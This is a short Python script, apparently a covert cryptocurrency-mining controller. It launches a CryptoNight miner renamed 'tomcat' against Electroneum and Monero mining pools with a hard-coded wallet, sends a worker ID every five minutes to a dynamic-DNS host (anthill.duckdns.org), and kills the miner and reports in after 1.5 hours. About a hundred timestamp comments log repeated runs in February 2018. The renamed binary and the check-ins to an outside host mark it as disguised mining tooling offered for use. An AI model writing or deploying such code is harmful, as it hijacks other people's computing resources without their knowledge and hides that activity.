import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:08:06.616266
#2018-02-17 16:54:08.085695
#2018-02-17 18:41:04.837370
#2018-02-17 20:29:03.819542
#2018-02-17 22:16:01.837428
#2018-02-17 23:59:04.949221
#2018-02-18 01:50:04.872385
#2018-02-18 03:37:06.329783
#2018-02-18 05:25:04.926941
#2018-02-18 07:17:06.106502
#2018-02-18 09:04:04.494654
#2018-02-18 10:51:05.392784
#2018-02-18 12:37:05.335265
#2018-02-18 14:23:05.653457
#2018-02-18 16:14:01.952686
#2018-02-18 18:02:06.075764
#2018-02-18 19:49:05.987343
#2018-02-18 21:37:03.409712
#2018-02-18 23:25:06.140419
#2018-02-19 01:12:01.365146
#2018-02-19 02:58:03.301573
#2018-02-19 04:45:06.562697
#2018-02-19 06:29:01.915283
#2018-02-19 08:19:03.586317
#2018-02-19 10:08:04.375990
#2018-02-19 11:57:08.742399
#2018-02-19 13:44:07.949281
#2018-02-19 15:34:03.973965
#2018-02-19 17:21:08.717951
#2018-02-19 19:08:04.626822
#2018-02-19 20:53:05.402846
#2018-02-19 22:42:03.896520
#2018-02-20 00:27:05.738483
#2018-02-20 02:15:06.992181
#2018-02-20 04:06:01.666358
#2018-02-20 05:49:05.843557
#2018-02-20 07:34:07.108039
#2018-02-20 09:18:07.502754
#2018-02-20 11:02:04.955599
#2018-02-20 12:48:08.470405
#2018-02-20 14:34:09.154238
#2018-02-20 16:19:04.820325
#2018-02-20 18:06:06.158844
#2018-02-20 19:56:04.413554
#2018-02-20 21:45:04.007423
#2018-02-20 23:25:06.961167
#2018-02-21 01:10:08.551322
#2018-02-21 02:56:03.981594
#2018-02-21 04:43:05.133218
#2018-02-21 06:30:08.879930
#2018-02-21 08:15:06.387623
#2018-02-21 10:02:05.655175
#2018-02-21 11:51:08.959451
#2018-02-21 13:41:07.709487
#2018-02-21 15:24:08.136427
#2018-02-21 17:14:05.737325
#2018-02-21 19:03:02.056717
#2018-02-21 20:52:02.161056
#2018-02-21 22:37:06.757135
#2018-02-22 00:27:05.505178
#2018-02-22 02:16:06.755524
#2018-02-22 04:02:05.916897
#2018-02-22 05:48:06.817684
#2018-02-22 07:34:04.389866
#2018-02-22 09:22:07.216596
#2018-02-22 11:08:05.238920
#2018-02-22 12:54:09.060503
#2018-02-22 14:42:01.516961
#2018-02-22 16:26:06.527041
#2018-02-22 18:14:07.440418
#2018-02-22 20:06:01.986839
#2018-02-22 21:54:06.410615
#2018-02-22 23:40:07.475124
#2018-02-23 01:29:05.752135
#2018-02-23 03:17:04.100083
#2018-02-23 05:03:07.923991
#2018-02-23 06:46:08.126797
#2018-02-23 08:34:01.803985
#2018-02-23 10:47:01.391476
#2018-02-23 12:43:09.522739
#2018-02-23 14:27:06.910800
#2018-02-23 16:17:08.713157
#2018-02-23 18:05:01.864508
#2018-02-23 19:51:06.128533
#2018-02-23 21:35:03.142572
#2018-02-23 23:22:07.809129
#2018-02-24 01:14:08.200857
#2018-02-24 03:06:01.502150
#2018-02-24 04:52:03.025139
#2018-02-24 06:37:06.082272
#2018-02-24 08:26:03.713548
#2018-02-24 10:12:01.345202
#2018-02-24 12:06:04.268446
#2018-02-24 13:54:03.594688
#2018-02-24 15:32:06.797757
#2018-02-24 17:26:06.441038
#2018-02-24 19:13:05.703679
#2018-02-24 21:01:01.526669
#2018-02-24 23:32:05.885473
#2018-02-25 02:55:01.406694
#2018-02-25 06:57:05.730860